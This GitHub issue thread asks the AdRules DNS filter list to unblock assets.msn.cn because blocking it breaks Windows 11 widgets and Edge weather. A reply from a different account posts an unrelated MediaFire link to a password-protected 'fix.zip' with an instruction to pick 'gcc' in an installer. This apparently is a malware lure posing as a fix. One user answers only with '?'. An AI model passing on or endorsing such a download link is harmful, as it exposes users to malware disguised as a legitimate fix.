### ISSUE TITLE
Windows 11 小组件报连接错误

### ISSUE THREAD

**Issue by suduogou** [Cats-Team/AdRules#198]
### Which tool do you use?

AdGuard Home

### Which AdRules DNS List Syntax do you use?

ABP

### Which domain(s) should be unblocked?

||assets.msn.cn^

### Why should the domain(s) be unblocked?

不好意思，没仔细测试，刚又发现一个问题。

Windows 11 小组向下滚动无法拉取信息，显示连接错误，Edge 起始页右上角无法显示天气信息。手动放行后恢复正常，因缓存原因，测试时间请间隔 5 分钟左右。

![003](https://github.com/user-attachments/assets/5acce3f8-3e84-48bc-b9a9-4a119a9eeb47)
![002](https://github.com/user-attachments/assets/63c0c6f7-950a-46e0-93be-f8cfd792e572)
![001](https://github.com/user-attachments/assets/14079d4b-8962-4249-9728-b9d0d1c2282d)
![000](https://github.com/user-attachments/assets/1890d6bf-f07a-4a1d-956d-539360447ce1)

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zutzo** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

?
